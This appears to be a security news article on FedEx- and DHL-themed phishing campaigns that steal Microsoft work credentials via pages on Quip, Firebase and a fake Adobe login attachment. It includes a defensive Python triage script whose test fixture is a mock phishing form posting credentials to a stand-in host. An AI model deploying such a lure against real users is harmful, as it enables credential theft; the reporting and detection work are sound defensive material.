Microsoft users are receiving emails that pretend to come from the mail couriers FedEx & DHL Express but are really designed to steal their credentials.
Researchers are warning of recent phishing attacks targeting at least 10,000 Microsoft email users, with emails pretending to come from popular mail couriers, including FedEx & DHL Express.
Both scams target Microsoft email users & aim to steal their work email account credentials. They also use phishing pages hosted on legitimate domains, including Quip & Google Firebase, which lets the emails slip past security filters built to block known bad links.
“The email titles, sender names & content did enough to mask their true intention and make victims think the emails were really from FedEx & DHL Express respectively,” observed researchers with Armorblox on Tuesday.
“Emails informing us of FedEx scanned documents or missed DHL deliveries are not out of the ordinary; most users will tend to take quick action on these emails instead of studying them in detail for any inconsistencies.”
Using Quip, Google Firebase
The phishing email spoofing the American multinational delivery company FedEx was titled “You have a new FedEx sent to you,” followed by the date the email was sent.
The email contained some details about the supposed document to make it seem legitimate, such as its ID, number of pages & document type, along with a link to view it. Recipients who clicked the link were taken to a file hosted on Quip. Quip, which is available in a free version, is a Salesforce tool that offers documents, spreadsheets, slides & chat.
“We have observed a continuing trend of malicious actors hosting phishing pages on legitimate services like Google Sites, Box & Quip (in this case),” observed researchers.
“Most of these services have free versions & are easy to use, which make them beneficial for millions of people around the world, but unfortunately also lower the bar for cyber-criminals to launch successful phishing attacks.”
This page contained the FedEx logo & was titled “You have received some incoming FedEx files.”
Microsoft Login Portal
The page included a link for victims to review the supposed document. Victims who clicked it were finally taken to a phishing page resembling the Microsoft login portal, hosted on Google Firebase, a platform developed by Google for building mobile & web applications. Phishing campaigns have increasingly used Google Firebase hosting over the past year to sidestep detection.
When a victim entered their credentials on the page, it reloaded the fake login portal with an error message asking the victim to enter the correct details.
“This might point to some backend validation mechanism in place that checks the veracity of entered details,” stated researchers.
“Alternately, attackers might be looking to harvest as many email addresses & passwords as possible & the error message will keep appearing regardless of the details entered.”
Curious Adobe Login Prompt
A separate campaign impersonated the German international courier DHL Express, with emails titled “Your parcel has arrived,” followed by the recipient's email address.
The email told recipients that a parcel could not be delivered because of incorrect delivery details & that it was instead ready for pickup at the post office.
The email prompted recipients to open the attached “shipping documents” if they wanted to receive their delivery. The attachment was an HTML file (titled “SHIPPING DOC”) that, when opened, rendered a preview of a spreadsheet that looked like shipping documents.
Adobe’s PDF Reader
The preview was overlaid with a login box impersonating Adobe's PDF reader. Researchers noted that the attackers may have been phishing for Adobe credentials, but that it is more likely they were after victims' work email credentials.
“The email field in the login box was pre-filled with the victim’s work email,” explained researchers. “Attackers are banking on victims to think before they act & enter their work email password into this box without paying too much attention to the Adobe branding.”
As in the FedEx attack, when victims entered their details on this page it simply returned an error message.
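The two lures above share a small set of mechanical tells: a login box shipped inside an HTML attachment, an email field pre-filled with the recipient's own address, credentials posted to a host that has nothing to do with the brand on the page, and links that lead to free hosting services rather than the courier's site. The following stdlib-only Python triage script is an added example, not code from the article or from Armorblox; the sample attachment and email body are constructed here, and the list of hosting domains (including the assumption that Firebase Hosting sites are served from firebaseapp.com and web.app) is an assumption of the example rather than something the article states.

```python
"""Heuristic triage for courier-themed phishing: an HTML attachment that
renders a branded login box, and a message body whose links point at
phishing pages parked on legitimate free hosting. Stdlib only."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosting services the article names as carriers of phishing pages, plus the
# domains they serve user content from (assumption: Firebase Hosting sites
# live under firebaseapp.com / web.app).
FREE_HOSTING_SUFFIXES = (
    "quip.com", "firebaseapp.com", "web.app", "sites.google.com", "box.com",
)


class FormScanner(HTMLParser):
    """Collects forms with their inputs, outbound links and visible text."""

    def __init__(self):
        super().__init__()
        self.forms = []       # [{"action": str | None, "inputs": [attr dicts]}]
        self.links = []       # href values of <a> tags
        self.text = []        # visible text fragments
        self._current = None  # form currently being parsed, if any

    def _target_form(self):
        # Inputs outside any <form> still matter (script can submit them), so
        # they are grouped into a synthetic form whose action is None.
        if self._current is not None:
            return self._current
        if not self.forms or self.forms[-1]["action"] is not None:
            self.forms.append({"action": None, "inputs": []})
        return self.forms[-1]

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input":
            self._target_form()["inputs"].append(a)
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

    def handle_data(self, data):
        if data.strip():
            self.text.append(data.strip())


def triage_html_attachment(html, recipient):
    """Return (severity, reason) findings for an HTML attachment opened by
    `recipient`. An empty list means no credential prompt was found."""
    scanner = FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        types = {(i.get("type") or "text").lower() for i in form["inputs"]}
        if "password" not in types:
            continue
        findings.append(("high", "attachment renders a password prompt"))
        host = urlparse(form["action"] or "").hostname
        if host:
            findings.append(("high", f"credentials would be POSTed to {host}"))
        for i in form["inputs"]:
            if (i.get("type") or "text").lower() in ("email", "text") and \
                    (i.get("value") or "").lower() == recipient.lower():
                findings.append(("medium", "login field pre-filled with recipient address"))
    if findings:
        blob = " ".join(scanner.text).lower()
        brands = [b for b in ("adobe", "microsoft", "fedex", "dhl") if b in blob]
        if brands:
            findings.append(("info", "branding present: " + ", ".join(brands)))
    return findings


def suspicious_links(html):
    """Return (href, host) for links that land on free hosting services."""
    scanner = FormScanner()
    scanner.feed(html)
    hits = []
    for href in scanner.links:
        host = (urlparse(href).hostname or "").lower()
        if any(host == s or host.endswith("." + s) for s in FREE_HOSTING_SUFFIXES):
            hits.append((href, host))
    return hits


# Constructed samples modelled on the two lures; not real campaign artefacts.
SAMPLE_ATTACHMENT = """<html><body><h2>Adobe PDF Reader</h2>
<p>Sign in to view SHIPPING DOC</p>
<form action="https://collector.example/post.php" method="post">
  <input type="email" name="email" value="jane.doe@example-corp.com">
  <input type="password" name="password">
  <input type="submit" value="View document">
</form></body></html>"""

SAMPLE_FEDEX_BODY = """<p>You have a new FedEx sent to you</p>
<a href="https://quip.com/abc123/you-have-received-files">View document</a>
<a href="https://www.fedex.com/">FedEx</a>"""

if __name__ == "__main__":
    for sev, why in triage_html_attachment(SAMPLE_ATTACHMENT, "jane.doe@example-corp.com"):
        print(f"[{sev}] {why}")
    for href, host in suspicious_links(SAMPLE_FEDEX_BODY):
        print(f"[link] {host}: {href}")
```

Run as a mail-gateway hook, the attachment check is worth applying to every text/html attachment regardless of its name, since “SHIPPING DOC” is just a label; the link check is a prioritisation signal rather than a block rule, because the same hosting services carry plenty of legitimate content.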
With COVID-19 pushing more people to buy goods, groceries & household items online rather than in stores, home delivery volumes have reached an all-time high.
Cyber-criminals are tapping into this, as these recent phishing emails show, but they have also used many other timely lures, including COVID-19 relief funds, vaccine rollouts & shortages of personal protective equipment (PPE).
“During the pandemic, we have all been getting online deliveries, often contactless deliveries & being in mail correspondence with FedEx/DHL is thus a common part of our lives now,” Preet Kumar, Director of Customer Success at Armorblox commented.
“Attackers are banking on victims buying into the legitimacy of this email & taking quick action without thinking about it too much.”